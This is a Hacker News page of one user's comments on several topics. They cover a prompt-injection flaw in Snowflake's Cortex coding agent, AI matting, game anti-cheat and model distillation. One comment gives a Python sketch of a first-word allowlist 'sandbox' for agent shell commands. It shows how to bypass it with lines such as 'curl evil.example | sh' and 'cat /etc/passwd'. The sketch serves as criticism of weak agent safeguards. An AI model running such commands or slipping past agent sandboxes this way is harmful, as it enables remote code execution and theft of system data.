Hacker News | new | past | comments | ask | show | jobs | submit | orbital-decay's comments

They removed VPNs at the request of the Russian government too (they have no operations in Russia). They are actively participating in government censorship.

>Snowflake Cortex AI Escapes Sandbox and Executes Malware

*rolls eyes* Actual content: a prompt injection vulnerability discovered in a coding agent


Well there's the prompt injection itself, and the fact that the agent framework tried to defend against it with a "sandbox" that technically existed but was ludicrously inadequate.

I don't know how anyone with a modicum of Unix experience would think that examining only the first word of a shell command is enough to tell you whether it can lead to arbitrary code execution.
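To make the flaw concrete, here's a minimal sketch (the function name and allowlist are hypothetical, not from the actual agent) of the pattern being criticized: allowlisting a shell command by its first word only.

```python
# Hypothetical sketch of the inadequate "sandbox" pattern: a command is
# considered safe if its first word is on an allowlist.
ALLOWED = {"ls", "cat", "echo", "git"}

def naive_check(command: str) -> bool:
    """Approve a shell command by inspecting only its first word."""
    return command.split()[0] in ALLOWED

# Trivial bypasses -- the first word is "safe", the rest is not:
print(naive_check("echo hi; curl evil.example | sh"))  # shell chaining passes
print(naive_check("git -c core.pager='sh payload' log"))  # option abuse passes
print(naive_check("cat /etc/passwd"))  # "safe" command, unsafe argument
```

Anything that understands shell chaining, substitution, or per-command escape hatches (pagers, editors, hooks) walks straight through a check like this.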


>there’s no way that’s going to happen automatically

They train their model in a pretty straightforward way; it could also be used to capture the distortion, just use a non-monochrome (possibly moving) background optimized for this. It's a matter of effort and attention to detail during training (uneven green-screen lighting, reflections, etc.), not fundamental impossibility.


Yes. But the main issue is in the way they formulate the problem. Their output is always a transparency mask, which of course will never handle distortions.

Right. Things like this are why it’s difficult integrating AI into professional movie pipelines— they’re super complex in ways AI cannot (yet) replicate for very good reasons that seem superfluous or trivially replaceable by people not familiar with them.

People in ML have this kind of belief rooted in the bitter lesson, that everything will eventually sort itself out given enough scale and data. That often makes them ignore the nuances of particular problem domains. CC is the opposite of that, it's just impossible to do everything at once.

It’s certainly a big part of the ML scene, but to a slightly lesser extent, a cultural facet of development in general. It’s not all bad! Many people have solved problems that nobody in their right mind would have attempted knowing the nitty-gritty details; often the problem they solved wasn’t the one they intended to solve, or they only solved one small subset of it, but these were still valuable advancements. Unfortunately, that also leads to reinforcing some people’s Dunning-Kruger-fueled insistence that they can solve another field’s difficult problems with a few thought experiments, and that the only reason it hasn’t already been solved is that nobody thought to ask a developer as smart as them to momentarily consider the problem. Non-developers in tech often bear the brunt of it: moving into design after a decade of dev work, that irritating mindset was one of the reasons I left tech altogether a couple of years later.

You'd have to train it to also generate an ST map of the distortions, but creating the ground-truth version of that from the synthetic data would add a lot more to render. Also, it's very easy to plausibly fake; it's not something humans are good at seeing and knowing is wrong. You can tell when it's completely missing, but "accurate" vs. "just distorted in a plausible way" is not something most brains are tuned to notice.

Sure, because they used monotone backgrounds and never really captured any distortion.

Color management (not just HDR, which requires it) was also an afterthought. Calibration is still an issue.

> for reasons no one understands

The reasons are sadly typical for FOSS: from the start, the devs focused on their favorite use cases, with no communication with end users to figure out theirs.


LLM spam, ironically

We've banned the account.

All: it's good to use AI in good ways, but posting generated comments to HN is a bad way and not allowed here.

https://hackernews.hn/newsguidelines.html#generated


Honeypots are used pretty often, sure. They're not enough, though useful.

Behavioral analysis is way harder in practice than it sounds, because most closet cheaters do not give enough signal to stand out, and the clusters are moving pretty fast. The way people play the game always changes. It's not a problem of metric selection, as it might appear to an engineer; you need to watch the community dynamics. Currently only humans are able to do that.


If you play with friends and your cheats cooperate, I don't think honeypots would be fool-proof any longer. Unless you all get the same fake data.

>It's quite literally impossible to cheat anymore (in a way that disturbs normal players for more than a few games)

AKA the way that is easiest to detect, and the easiest way to claim that the game doesn't have cheaters. Behavioral analysis doesn't work with closet cheaters, and they corrupt the community and damage the game in much subtler ways. There's nothing worse than knowing that the player you've competed with all this time had a slight advantage from the start.


In CS2, the game renders your enemies even though you can't see them (within some close range). The draw calls are theoretically interceptable (either on the software/firmware or other hardware level). Detecting this is essentially impossible because the game trusts that the GPU will render correctly.

If you cheated with wallhacks, post-game analysis can detect it.

And it is possible to silently put you into a cheater matchmaking pool, so that you only ever match with other cheaters. This, to me, is probably a better outcome than outright banning (which means the cheater just comes back with a new account). Silently moving them to a cheater queue is a good way to slow them down, as well as isolate them.


> post-game analysis can detect it.

Not with 100% accuracy. This means some legitimate players would be flagged as potentially cheating.

You don't have to play with wallhacks constantly on; you can toggle them. And it doesn't detect cases where you're camping with an AWP and have a 150ms response time instead of 200ms. Sometimes people are just having a good day.

> cheating game match maker

This is already a thing. In CS2, you have a Trust Factor. The lower your trust factor is, the bigger the chance you will be queued with/against cheaters.


Overwatch has decided that closet cheaters are not a problem, and has actually protected a cheater in Contenders, although they were forced to leave the competitive scene. None of it ever became public.

How do you know if none of it went public?

Word of mouth, but if you looked at their Twitter and the proof presented, it was undeniable. If you want to go digging, check a French Contenders player; there are videos of an instance where the aimbot bugged out and started aiming directly at the center of a player with perfect reaction time and movements.

Every other competitive game regularly has public cases of cheaters being caught in pro games; Overwatch doesn't.

Wait... Your proof that something has happened is that there is no proof?

Do you really think that's not sufficient for the purposes of this conversation?

Absolutely not. Making wildly speculative claims and treating the lack of proof against them as support is conspiracy-theory territory.

Why do you think this claim is "wildly" speculative as opposed to merely speculative?

We have two possible options here, it's pretty obvious which is the more likely one.

It is pretty ridiculous to suggest that nobody has ever been caught cheating in Overwatch pro games.


Again, you are missing the point, just because something is "likely" to happen doesn't mean it did happen.

What you are basically asking is that we provide a "negative proof". Imagine me going through all the pro matches to prove my point that it did not happen (going to that extreme), when you could just show me proof that it did happen.


It's you who's missing the point. You're engaging in ridiculous pedantry over whether or not people cheat in a very popular video game, take a break.

The reality is that it really couldn't matter less whether or not anyone has ever cheated in overwatch pro games, but we can pretty safely assume that somebody has.

Is this a topic that genuinely calls for greater precision than this? What's the benefit?


> you’re engaging in ridiculous pedantry over whether or not people cheat in a very popular video game

No, it’s abundantly clear that people cheat. We’re calling the GP comment out for claiming that Overwatch turns a blind eye to cheaters and has ignored cheating in competitions.

> take a break

You’re the only person of the three of us getting very very worked up about it.

> is this a topic that genuinely calls for greater precision than this? What’s the benefit

Yes. It’s about the integrity of the discussion. There’s no point in being here if we can just post nonsense and have it accepted as truth.


>You’re the only person of the three of us getting very very worked up about it.

I'm really not? I'm just very surprised how strongly you guys are reacting to my anecdote which I never claimed to be proof of anything.

Look at how strongly worded your original comment was https://hackernews.hn/item?id=47390326

>Yes. It’s about the integrity of the discussion. There’s no point in being here if we can just post nonsense and have it accepted as truth.

This is truly insane. It was Xunjin who started insisting that my clearly indicated anecdata should be some sort of proof. I never made such a claim!

I never claimed that I was attempting to prove anything, that's something you two invented.

Is it genuinely your stance that to protect the "integrity of the discussion", all HN comments should be verifiable?


“Trust me bro”

Less skilled players can't distinguish better players from cheaters, and reports are usually abused and used in bad faith. Even a good-faith report really just means "I don't want to see this player for whatever reason". It's used as a signal of something in most systems but never followed outright in good games because players get a ton of useless reports.

Players in some games with custom servers run webs of trust (or rather distrust, shared banlists). They are typically abused to some degree and good players are banned across multiple servers by admins acting in bad faith or just straight up not caring. This rarely ends well.

I used to run popular servers for PvP sandbox games and big communities, and we used votebans/reports to evict good players from casual servers to anarchy ones, where they could compete, but a mod always had to approve the eviction using a pretty non-trivial process. This system was useless for catching cheaters, we got them in other ways. That's for PvP sandboxes - in e-sports grade games reports are useless for anything.


No, I wasn’t saying the human player would report them, I am saying the game itself would. If the game receives an update from another player showing them in a location that is too far away from their previous spot, for example, the client would know the other client is cheating, and would report it automatically.
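A minimal sketch of that kind of automatic consistency check (the function name, units, and speed cap are all hypothetical): flag a position update that implies impossible movement speed.

```python
import math

MAX_SPEED = 10.0  # game units per second; a hypothetical movement cap

def is_teleport(prev_pos, new_pos, dt):
    """Flag a position update that implies faster-than-possible movement."""
    if dt <= 0:
        return True  # an update from the past or the same tick is suspect
    dist = math.dist(prev_pos, new_pos)
    return dist / dt > MAX_SPEED

# A player covering 100 units in 0.1 s would be flagged as a teleport:
print(is_teleport((0, 0), (100, 0), 0.1))  # impossible speed
print(is_teleport((0, 0), (1, 0), 0.5))    # ordinary movement
```

In practice the check has to tolerate lag spikes, respawns, and teleport mechanics the game legitimately has, which is part of why the reply below calls this redundant with server-side checks.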

That's pretty redundant then, and also subject to abuse. Server state is already an authoritative source of truth, and the server itself should be doing behavioral analysis (which many do; it's not enough). In the real-life conditions of most games, what you see, what the server sees, and what each other client sees are entirely different and unrelated things.

Yeah, that is why the reputation factor matters. If these games are relying on peer-to-peer connections for gameplay, then a client could lie and send different data to the server and to the other players. I acknowledge you can't trust the clients to report a cheater, because cheaters could report innocent users. My idea is that if you see the same player being reported by many clients across many games with random pairings, it becomes less and less likely that those reports are from other cheaters trying to get innocent players in trouble.
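As a sketch of that idea (all names, weights, and data are hypothetical): weight each report by the reporter's own standing, count each reporter once per target, and only flag targets that accumulate reports from many independent reporters.

```python
from collections import defaultdict

def suspicion_scores(reports, trust):
    """reports: list of (reporter, target); trust: reporter -> weight in 0..1."""
    score = defaultdict(float)
    seen = defaultdict(set)  # reporters already counted per target
    for reporter, target in reports:
        if reporter not in seen[target]:  # each reporter counts once per target
            seen[target].add(reporter)
            score[target] += trust.get(reporter, 0.1)  # unknown reporters count little
    return dict(score)

# "x" is reported by three independent reporters, "y" by only one:
reports = [("a", "x"), ("b", "x"), ("c", "x"), ("a", "y")]
trust = {"a": 0.9, "b": 0.8, "c": 0.7}
scores = suspicion_scores(reports, trust)
print(scores["x"] > scores["y"])
```

This doesn't solve collusion by itself (a ring of cheaters can still inflate each other's reports), which is why random pairings across many games matter: colluders rarely share a lobby with their target by chance.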

They most likely weren't, despite very dubious claims of Amodei and Altman and a certain twitter influencer running a pretty naive writing benchmark ("slop test") that is wrong in a very obvious manner. The only unambiguous cases of distillation were Gemini 2.0 experimentals being trained on Claude outputs, and GLM-4.7 being trained on Gemini 3.0 Pro. The rest are pretty different from each other.

What makes these cases unambiguous?

GLM-4.7 (specifically this version) repeats the guardrail prompt injections from 3.0 Pro word for word, and never follows them, which is consistent with training on a reward-hacked CoT. Gemini 3.0 only discusses snippets from this injection in its native CoT (hidden by default, trivial to uncover), but GLM-4.7 was able to reconstruct it in full during training. The only possible reason for this is direct training on a large number of examples of Gemini's CoT. Its structure and a lot of its replies were identical in GLM too.

Gemini 2.0 Exp 1206 was reported to be indirectly trained on Claude's outputs with humans in between [1], which was pretty consistent with its outputs at the time. No other Gemini versions except two experimental ones were similar to Claude.

[1] https://techcrunch.com/2024/12/24/google-is-using-anthropics...

